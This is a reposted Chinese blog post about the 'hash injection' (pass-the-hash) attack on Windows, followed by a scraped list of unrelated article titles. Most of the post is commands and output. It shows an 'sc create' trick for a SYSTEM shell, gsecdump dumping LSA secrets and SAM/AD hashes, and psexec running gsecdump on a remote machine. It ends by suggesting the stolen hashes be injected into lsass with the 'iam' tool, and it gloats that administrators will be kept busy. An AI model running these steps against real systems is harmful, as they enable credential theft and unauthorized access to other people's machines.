HASH注入式攻击
来源:互联网 发布:foxtable 连接数据库 编辑:程序博客网 时间:2024/06/02 22:19
文章作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
下载网址:
http://www.truesec.com/PublicSto ... tectCookieSupport=1
To get a DOS Prompt as NT system:
C:/>sc create shellcmdline binpath= "C:/WINDOWS/system32/cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS
C:/>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:/>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:/WINDOWS/system32>whoami
NT AUTHORITY/SYSTEM
C:/WINDOWS/system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:
PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com
C:/>psexec //COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
to get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:http://truesecurity.se/blogs/mur ... -text-password.aspx
- HASH注入式攻击
- SQL 注入式攻击
- 防止注入式攻击
- 注入式攻击2
- 注入式攻击1
- SQL注入式攻击
- SQL注入式攻击
- SQL注入式攻击
- SQL注入式攻击
- SQL注入式攻击
- SQL注入式攻击
- sql注入式攻击
- sql注入式攻击
- SQL注入式攻击
- SQL注入式攻击
- SQL注入式攻击
- SQL注入式攻击
- SQL注入式攻击
- 为什么大型矩阵乘法要用分块
- MySQL Workbench Connection Failed resolving
- 第一篇博客
- mysql limit 扫描行数 & order by 与索引关系
- myeclipse spket 问题求解
- HASH注入式攻击
- Android NDK开发技巧一
- 关于Android开发过程中,createImage的一些总结。
- arm-linux-gcc 4.1.1 编译 QT 4.7 for ARM 中的错误
- 通过DataSet从文件中读取Xml文档
- Android JNI开发入门篇
- 爱情
- 有感
- Android JNI开发提高篇